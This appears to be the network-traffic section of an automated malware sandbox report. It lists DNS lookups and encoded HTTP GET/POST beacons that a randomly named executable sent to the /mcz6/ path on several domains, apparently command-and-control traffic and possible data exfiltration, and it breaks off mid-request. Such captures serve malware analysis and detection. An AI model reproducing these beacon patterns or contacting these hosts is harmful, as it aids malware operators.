May 16, 2024 17:22:05.880093098 CEST | 53 | 58742 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 16, 2024 17:18:46.281903028 CEST | 192.168.2.9 | 1.1.1.1 | 0xa694 | Standard query (0) | www.dty377.com | A (IP address) | IN (0x0001) | false
May 16, 2024 17:19:03.737169027 CEST | 192.168.2.9 | 1.1.1.1 | 0xa5b3 | Standard query (0) | www.lenslaser.com | A (IP address) | IN (0x0001) | false
May 16, 2024 17:19:19.260643005 CEST | 192.168.2.9 | 1.1.1.1 | 0x2f2c | Standard query (0) | www.allinone24.shop | A (IP address) | IN (0x0001) | false
May 16, 2024 17:19:48.417943001 CEST | 192.168.2.9 | 1.1.1.1 | 0x603a | Standard query (0) | www.carliente.com | A (IP address) | IN (0x0001) | false
May 16, 2024 17:20:02.230272055 CEST | 192.168.2.9 | 1.1.1.1 | 0x9287 | Standard query (0) | www.walletweb367.top | A (IP address) | IN (0x0001) | false
May 16, 2024 17:20:25.971894026 CEST | 192.168.2.9 | 1.1.1.1 | 0xef21 | Standard query (0) | www.deaybrid.info | A (IP address) | IN (0x0001) | false
May 16, 2024 17:20:39.596889973 CEST | 192.168.2.9 | 1.1.1.1 | 0x6f1 | Standard query (0) | www.prizesupermarket.com | A (IP address) | IN (0x0001) | false
May 16, 2024 17:20:47.689915895 CEST | 192.168.2.9 | 1.1.1.1 | 0x2fdc | Standard query (0) | www.jrksa.info | A (IP address) | IN (0x0001) | false
May 16, 2024 17:20:55.767719984 CEST | 192.168.2.9 | 1.1.1.1 | 0x969c | Standard query (0) | www.cookedatthebottom.com | A (IP address) | IN (0x0001) | false
May 16, 2024 17:21:03.863369942 CEST | 192.168.2.9 | 1.1.1.1 | 0x8a39 | Standard query (0) | www.celebration24.co.uk | A (IP address) | IN (0x0001) | false
May 16, 2024 17:21:20.027964115 CEST | 192.168.2.9 | 1.1.1.1 | 0xc2c5 | Standard query (0) | www.gledingakademiet.no | A (IP address) | IN (0x0001) | false
May 16, 2024 17:21:35.033628941 CEST | 192.168.2.9 | 1.1.1.1 | 0xb704 | Standard query (0) | www.alfaspa.net | A (IP address) | IN (0x0001) | false
May 16, 2024 17:21:43.112194061 CEST | 192.168.2.9 | 1.1.1.1 | 0xfeb6 | Standard query (0) | www.zwervertjes.be | A (IP address) | IN (0x0001) | false
May 16, 2024 17:21:57.769927025 CEST | 192.168.2.9 | 1.1.1.1 | 0x6c3e | Standard query (0) | www.maerealtysg.com | A (IP address) | IN (0x0001) | false
May 16, 2024 17:22:05.861922979 CEST | 192.168.2.9 | 1.1.1.1 | 0xb7ad | Standard query (0) | www.polhi.lol | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    May 16, 2024 17:18:01.724160910 CEST | 1.1.1.1 | 192.168.2.9 | 0x1ee6 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:18:01.724160910 CEST | 1.1.1.1 | 192.168.2.9 | 0x1ee6 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:18:46.318281889 CEST | 1.1.1.1 | 192.168.2.9 | 0xa694 | No error (0) | www.dty377.com | dty377.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                    May 16, 2024 17:18:46.318281889 CEST | 1.1.1.1 | 192.168.2.9 | 0xa694 | No error (0) | dty377.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:18:46.318281889 CEST | 1.1.1.1 | 192.168.2.9 | 0xa694 | No error (0) | dty377.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:19:03.759160042 CEST | 1.1.1.1 | 192.168.2.9 | 0xa5b3 | No error (0) | www.lenslaser.com | lenslaser.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                    May 16, 2024 17:19:03.759160042 CEST | 1.1.1.1 | 192.168.2.9 | 0xa5b3 | No error (0) | lenslaser.com | | 162.241.216.140 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:19:19.350558996 CEST | 1.1.1.1 | 192.168.2.9 | 0x2f2c | No error (0) | www.allinone24.shop | allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai | | CNAME (Canonical name) | IN (0x0001) | false
                                                    May 16, 2024 17:19:19.350558996 CEST | 1.1.1.1 | 192.168.2.9 | 0x2f2c | No error (0) | allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai | | 57.151.38.169 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:19:48.459769011 CEST | 1.1.1.1 | 192.168.2.9 | 0x603a | No error (0) | www.carliente.com | carliente.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                    May 16, 2024 17:19:48.459769011 CEST | 1.1.1.1 | 192.168.2.9 | 0x603a | No error (0) | carliente.com | | 217.160.0.111 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:20:03.037931919 CEST | 1.1.1.1 | 192.168.2.9 | 0x9287 | No error (0) | www.walletweb367.top | | 91.195.240.123 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:20:26.148905993 CEST | 1.1.1.1 | 192.168.2.9 | 0xef21 | No error (0) | www.deaybrid.info | | 162.0.237.22 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:20:39.629744053 CEST | 1.1.1.1 | 192.168.2.9 | 0x6f1 | Name error (3) | www.prizesupermarket.com | none | none | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:20:47.707596064 CEST | 1.1.1.1 | 192.168.2.9 | 0x2fdc | Name error (3) | www.jrksa.info | none | none | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:20:55.798949957 CEST | 1.1.1.1 | 192.168.2.9 | 0x969c | Name error (3) | www.cookedatthebottom.com | none | none | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:21:04.290478945 CEST | 1.1.1.1 | 192.168.2.9 | 0x8a39 | No error (0) | www.celebration24.co.uk | | 103.168.172.37 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:21:04.290478945 CEST | 1.1.1.1 | 192.168.2.9 | 0x8a39 | No error (0) | www.celebration24.co.uk | | 103.168.172.52 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:21:20.094080925 CEST | 1.1.1.1 | 192.168.2.9 | 0xc2c5 | No error (0) | www.gledingakademiet.no | | 104.37.39.71 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:21:35.046552896 CEST | 1.1.1.1 | 192.168.2.9 | 0xb704 | Name error (3) | www.alfaspa.net | none | none | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:21:43.313507080 CEST | 1.1.1.1 | 192.168.2.9 | 0xfeb6 | No error (0) | www.zwervertjes.be | | 199.59.243.225 | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:21:57.805222988 CEST | 1.1.1.1 | 192.168.2.9 | 0x6c3e | Name error (3) | www.maerealtysg.com | none | none | A (IP address) | IN (0x0001) | false
                                                    May 16, 2024 17:22:05.880093098 CEST | 1.1.1.1 | 192.168.2.9 | 0xb7ad | Name error (3) | www.polhi.lol | none | none | A (IP address) | IN (0x0001) | false
                                                    • www.dty377.com
                                                    • www.lenslaser.com
                                                    • www.allinone24.shop
                                                    • www.carliente.com
                                                    • www.walletweb367.top
                                                    • www.deaybrid.info
                                                    • www.celebration24.co.uk
                                                    • www.gledingakademiet.no
                                                    • www.zwervertjes.be
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.9 | 49713 | 3.33.130.190 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:18:46.331711054 CEST | 470 | OUT | GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw== HTTP/1.1
                                                    Host: www.dty377.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:18:48.392440081 CEST | 396 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 16 May 2024 15:18:47 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 256
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 78 6c 3d 68 42 6c 6c 42 36 6b 70 34 44 31 64 42 46 4b 26 31 4a 6f 68 3d 44 35 2b 70 46 32 2f 4f 35 6f 6e 6b 52 67 73 77 4e 35 6d 43 56 54 54 76 48 72 36 6c 36 51 35 47 4d 51 64 7a 59 6a 2f 39 58 5a 70 6b 77 7a 69 39 64 64 6a 30 63 72 77 6f 36 48 37 39 77 53 50 71 41 75 58 59 61 44 67 6a 78 59 48 36 35 4e 4f 77 6f 31 44 69 45 42 42 42 33 52 43 75 74 4e 6c 44 39 4b 50 79 51 47 36 61 4e 6f 30 6a 52 6a 73 43 69 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw=="}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.9 | 49714 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:19:03.768347025 CEST | 732 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4b 56 61 53 6b 48 6c 75 38 33 50 4c 61 58 2b 64 56 55 47 57 72 63 4b 72 4e 71 67 71
                                                    Data Ascii: 1Joh=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtKVaSkHlu83PLaX+dVUGWrcKrNqgq
                                                    May 16, 2024 17:19:05.125972033 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:04 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.9 | 49716 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:19:06.306803942 CEST | 756 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 4b 4d 4b 4e 70 43 63 55 4e 32 62 37 57 67 61 47 74 48 68 66 45 68 58 45 43 52 37 77 3d 3d
                                                    Data Ascii: 1Joh=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LKMKNpCcUN2b7WgaGtHhfEhXECR7w==
                                                    May 16, 2024 17:19:07.694478989 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:06 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.9 | 49717 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:19:08.836431980 CEST | 1769 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 57 73 64 42 32 66 52 6d 57 57 36 4b 79 39 4c 4e 4a 55 59 77 73 56 56 35 76 30 44 6d 31 69 30 74 70 78 55 6c 58 6e 6a 71 42 72 4d 38 44 53 67 48 5a 36 77 39 63 39 44 4d 50 72 41 2b 54 4d 30 66 42 57 79 33 76 46 6f 4b 6e 49 38 73 6d 45 36 35 64 72 74 6e 38 2b 49 70 61 38 7a 54 4a 41 75 52 4a 2f 58 7a 32 54 75 49 2b 42 58 39 62 55 4f 31 59 32 43 57 4a 63 33 69 75 58 61 62 2f 79 4e 67 4a 4e 4a 68 47 45 7a 70 77 4f 34 48 34 36 75 49 36 4b 2f 46 5a 57 66 31 32 64 56 76 6a 52 38 4b 66 57 47 [TRUNCATED]
                                                    Data Ascii: 1Joh=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 [TRUNCATED]
                                                    May 16, 2024 17:19:09.538666964 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:09 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.9 | 49718 | 162.241.216.140 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:19:11.367878914 CEST | 473 | OUT | GET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:19:12.440829039 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:12 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.9 | 49719 | 57.151.38.169 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:19:19.363163948 CEST | 738 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.allinone24.shop
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.allinone24.shop
                                                    Referer: http://www.allinone24.shop/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 76 58 63 5a 46 74 50 68 45 4b 57 4a 53 37 6f 45 71 4a 4c 49 38 54 31 71 51 55 44 50 32 77 37 48 50 36 5a 65 66 69 69 64 77 4c 69 46 6d 75 74 50 73 6b 37 7a 6a 70 2f 42 66 36 39 57 79 63 35 71 2b 4d 6c 37 6d 32 57 48 47 65 39 70 43 52 59 61 4d 2f 6c 72 4e 39 72 74 4f 38 47 56 49 35 4e 69 64 5a 43 5a 4e 41 4a 58 55 31 2b 37 66 65 77 43 5a 6b 72 49 50 4f 43 5a 44 78 33 51 44 62 41 54 6d 66 31 54 50 6f 34 2f 77 69 63 46 7a 48 69 7a 69 69 64 31 4d 65 30 54 51 4e 69 73 54 56 53 58 41 7a 53 4a 48 62 73 31 41 30 78 4e 65 79 61 46 47 46 35 2f 79 61 68 4f 62 43 69 47
